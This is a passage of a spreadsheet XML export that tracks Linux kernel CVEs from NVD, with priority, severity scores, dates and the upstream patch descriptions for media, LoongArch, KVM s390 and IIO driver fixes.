      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rc: sunxi-cir: Unregister rc device on probe failure
After rc_register_device() succeeds, later probe failures must undo the
registration with rc_unregister_device(). The current error path jumps to
the allocation cleanup label and only calls rc_free_device(), leaving the
rc device registration and resources created by rc_register_device()
behind.
Add a registered-device unwind label for the IRQ lookup, IRQ request, and
hardware initialization failure paths. Keep rc_free_device() for failures
before rc_register_device() succeeds.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89883</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89887</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov7740: fix use-after-destroy in remove
The ov7740_remove() function had a severe teardown order bug where it
destroyed the driver's mutex before freeing the V4L2 control handler
which relies on that mutex, leading to a use-after-destroy kernel panic.
Furthermore, the driver explicitly called v4l2_ctrl_handler_free() and
mutex_destroy() sequentially, but then called ov7740_free_controls()
which invokes both of them a second time, resulting in a double-free.
This patch fixes the issue by unregistering the subdevice first, and
relying exclusively on ov7740_free_controls() to safely tear down the
mutex and control handler in the correct order.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89887</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89888</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov02a10: fix endpoint parsing use-after-free
The ov02a10_check_hwcfg() function calls fwnode_handle_put(ep)
immediately after allocating and parsing the endpoint. However, it
subsequently calls fwnode_property_read_u32() using the same 'ep'
handle, leading to a potential use-after-free.
Additionally, reading the optional 'ovti,mipi-clock-voltage' property
used to overwrite the 'ret' variable. If the property was missing,
'ret' would become negative, and this failure code would be incorrectly
returned at the end of the function, causing probe to fail entirely.
Fix the use-after-free by moving fwnode_property_read_u32() before
the endpoint is parsed and freed. Avoid the error leak by not
assigning the result of fwnode_property_read_u32() to 'ret'.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89888</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89890</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: go7007: defer the ALSA v4l2 put until card release
go7007_snd_init() already takes a v4l2_device reference for the ALSA
side, but go7007_snd_remove() drops it immediately after calling
snd_card_free_when_closed().
That is too early when a userspace process still has the capture PCM open.
The ALSA card and its PCM callbacks remain alive until the last file is
closed, so the release path can still reach struct go7007 through
pcm-&gt;private_data and call go7007_snd_hw_free() after the V4L2 release path
has freed the object.
Move the matching v4l2_device_put() to the ALSA card private_free callback
so the existing ALSA reference covers the whole deferred card lifetime.</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89890</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89893</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cx23885: cancel NetUP CI work before teardown
netup_ci_exit() frees a netup_ci_state while its work item,
netup_read_ci_status(), may still be pending or running on the system
workqueue. The worker obtains the state with container_of() and
dereferences it, so it must not outlive the state.
netup_ci_init() queues the initial status read, and CI GPIO interrupts
subsequently queue the same work from netup_ci_slot_status(). During
remove, cx23885_finidev() calls free_irq() before the CI device is
unregistered. free_irq() prevents further IRQ handlers from running,
but does not drain work queued previously, so the worker can run after
netup_ci_exit() frees the state.
Call cancel_work_sync() before dvb_ca_en50221_release() and kfree().
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89893</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89894</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cx231xx: reject geometry changes while the VBI queue is busy
vidioc_s_fmt_vid_cap() and vidioc_s_std() change the device-wide
dev-&gt;width / dev-&gt;norm but only refuse the change when the *video* queue
(dev-&gt;vidq) is busy. The VBI queue (dev-&gt;vbiq) shares that same geometry:
cx231xx_init_vbi_isoc() latches dma_q-&gt;lines_per_field from dev-&gt;norm,
the VBI videobuf2 plane is sized from dev-&gt;width / dev-&gt;norm in
vbi_queue_setup() and vbi_buf_prepare(), and cx231xx_do_vbi_copy() then
recomputes the destination offset from the *live* dev-&gt;width and the
latched lines_per_field on every URB completion:
	offset = lines_completed * (dev-&gt;width &lt;&lt; 1) + ...;
	if (dma_q-&gt;current_field == 2)
		offset += dev-&gt;width * 2 * dma_q-&gt;lines_per_field;
	memcpy(plane + offset, p_buffer, lencopy);
Because the VBI node shares video_ioctl_ops with the video node, an
application can size a small VBI plane (REQBUFS/QBUF with a small width,
or with the NTSC standard), then enlarge dev-&gt;width (or switch dev-&gt;norm
to PAL) through the video node while the VBI stream is running -- the
change is allowed because only dev-&gt;vidq is checked -- and let the device
deliver a field-2 VBI payload. cx231xx_do_vbi_copy() now computes the
offset with the larger geometry and memcpy()s past the end of the smaller
plane that was already allocated, a heap out-of-bounds write whose offset
is attacker-chosen and whose contents come from the device. The
per-field guard in cx231xx_copy_vbi_line() does not help: it bounds the
copy against the latched lines_per_field, not the plane's real capacity,
and vb2 does not re-run buf_prepare() for an already prepared buffer.
Refuse the format/standard change when the VBI queue is busy as well, so
the geometry cannot change underneath an allocated VBI buffer.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89894</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89899</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: disable delayed work before freeing an interrupted transmit
cec_transmit_msg_fh() drops adap-&gt;lock to wait for a blocking transmit in
wait_for_completion_killable(). If that wait is interrupted by a signal,
cancel_delayed_work_sync() can run before the CEC kthread arms the reply
timeout via schedule_delayed_work(&amp;data-&gt;work) in cec_transmit_done_ts().
The work is then armed after the cancel, and the data is freed with its
delayed_work still pending:
  ODEBUG: free active (active state 0) object: ... hint: cec_wait_timeout
Use disable_delayed_work_sync(): it cancels the work and disables it, so
the later schedule_delayed_work() becomes a no-op and the work cannot be
re-armed. The data is freed right after, so it need not be re-enabled.</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89899</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89902</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Avoid preempt count underflow without probe
LoongArch uses break 11 for the breakpoint placed after an instruction
that Kprobes executes out of line. Since userspace can issue the same
break instruction, do_bp() can reach kprobe_singlestep_handler() when
there is no current probe.
The handler actually returns false in this case, but it first calls
preempt_enable_no_resched(). The corresponding preempt_disable() is done
by kprobe_breakpoint_handler() on a real Kprobe hit, so it has not run
here. As a result, an ordinary userspace breakpoint (code 11) underflows
the current task's preempt count.
This also makes in_interrupt() return true until the task schedules. One
visible consequence is the socket cgroup attribution: cgroup_sk_alloc()
treats the allocation as interrupt context and assigns the socket to the
root cgroup. A socket opened from the SIGTRAP handler can then avoid a
BPF_CGROUP_INET_SOCK_CREATE policy attached to the task's own cgroup.
Return as soon as kprobe_running() reports no active probe.
The same check has appeared in [PATCH v10 2/4] of the original LoongArch
Kprobes series, but was dropped before the feature reached mainline.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89902</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89903</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Do not save/restore percpu base register in rethook trampoline
The rethook trampoline saves $r21 ($u0), the percpu base, into its frame
at entry and restores it at exit. Inbetween rethook_trampoline_handler()
may schedule via preempt_enable_notrace().
If the task migrates to another CPU, the frame's $r21 holds the old
CPU's percpu base, and restoring it poisons $r21 on the new CPU. Until
the next user-&gt;kernel transition heals $r21, all this_cpu_*() accesses
(runqueues, RCU per-CPU data, timer tick programming, FPU ownership)
hit the wrong CPU's percpu area.
Under kretprobe-heavy preemptible load this can corrupt scheduler and
timer state: scheduling-while-atomic splats, wrong-CPU RCU warnings,
WARN_ON_ONCE(rq != this_rq()) in nohz_balance_exit_idle(), and CPUs
parking in the idle loop with the constant timer never re-armed (hard
lockup). Reproduces on a Loongson-3A6000 with kretprobes on VFS paths
plus heavy file churn (OS install / unsquashfs).
By convention $r21 always holds the current CPU's percpu base in kernel
mode: SAVE_SOME() at exception entry reloads it only when coming from
user mode, and RESTORE_SOME() restores it only when returning to user
mode; the context-switch path never writes it. Therefore the live $r21
at trampoline exit is already correct, and nothing inbetween can change
it legitimately (kernel C code cannot write a global register variable).
The same flaw existed even in the pre-rethook kretprobe trampoline since
v6.3; it was carried over when rethook replaced it. Drop both the save
and the restore here. Drop the restore is enough to solve the issue, and
drop the save is to keep the code tidy and no need to clear it.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89903</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89906</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Refactor jump offset calculation in tail call
The old macro-based jmp_offset calculation derives the jump distance
from a stale prior-pass code stride, which can lead to wrong branch
offsets and soft lockups under extra JIT passes.
Fix this by calculating the offset directly on the absolute target:
"ctx-&gt;offset[insn + 1] - ctx-&gt;idx".
To avoid a false 16-bit range check abort during size estimation, add
a "ctx-&gt;image == NULL" guard to inject a safe dummy offset.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89906</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89919</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: keyop: use mmu_lock to read gmap-&gt;asce
Every other dat_* consumer in this file (kvm_s390_get_skeys,
set_skeys, get_cmma_bits, set_cmma_bits, MEM_CLR_CMMA,
kvm_s390_fixup_prefix, kvm_test_age_gfn, kvm_age_gfn) reads
kvm-&gt;arch.gmap-&gt;asce *inside* the mmu_lock read-side. keyop is the only
outlier.
gmap-&gt;asce is mutated under write_lock(mmu_lock) by gmap_set_limit()
and keyop might use a stale asce value for walking as KVM_S390_KEYOP
and KVM_S390_VM_MEM_LIMIT_SIZE can run concurrently. This can result
in memory corruption.</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89919</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89920</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix memory corruption by not reinjecting CK machine checks
Channel-subsystem damage machine checks are for the host channel
subsystem. The guest channel subsystem is emulated in the userspace VMM.
There is no point in forwarding such machine checks into the guest.
This also simplifies the machine check reinjection and avoids kfree of a
stack variable as reported by sashiko.  There might be still machine
checks that have the ck bit set with another bit (like instruction
damage), mask out the CK bit in s390_backup_mcck_info(), like the CP and
ED bits already are.</t>
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89920</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89922</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Take srcu when importing watchpoint data
__import_wp_info() backs up the original guest memory contents of a
watchpoint with read_guest_abs(), which is kvm_read_guest() and therefore
resolves the memslot via __kvm_memslots(). That requires kvm-&gt;srcu (or
kvm-&gt;slots_lock) to be held, otherwise a concurrent memslot update can
free the memslots array under us once its SRCU grace period has elapsed.
As this is not fast path, following lock ordering (mutex first, then
srcu) take the big hammer and hold the srcu for the full import.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89922</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89938</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: chemical: atlas-sensor: use iio_trigger_poll_nested() to fix remove UAF
The atlas driver requests its hardware data-ready IRQ with
devm_request_threaded_irq(); its threaded handler queues an irq_work,
atlas_work_handler(), that calls iio_trigger_poll(data-&gt;trig).
The IRQ is devm-managed, so free_irq() runs from the devres unwind after
atlas_remove() returns without flushing that irq_work.  Once a buffer is
enabled, conversion-complete IRQs keep firing and queueing it; a pending
irq_work can therefore run after the unwind has freed atlas_data/indio_dev
and the trigger, when atlas_work_handler() derives the atlas_data pointer
via container_of() and dereferences data-&gt;trig, a use-after-free.
Call iio_trigger_poll_nested() directly from the threaded handler instead
of bouncing through irq_work.  free_irq() then drains the threaded handler,
closing the window; other iio drivers with a threaded data-ready IRQ do the
same (e.g. bmi270).
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89938</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
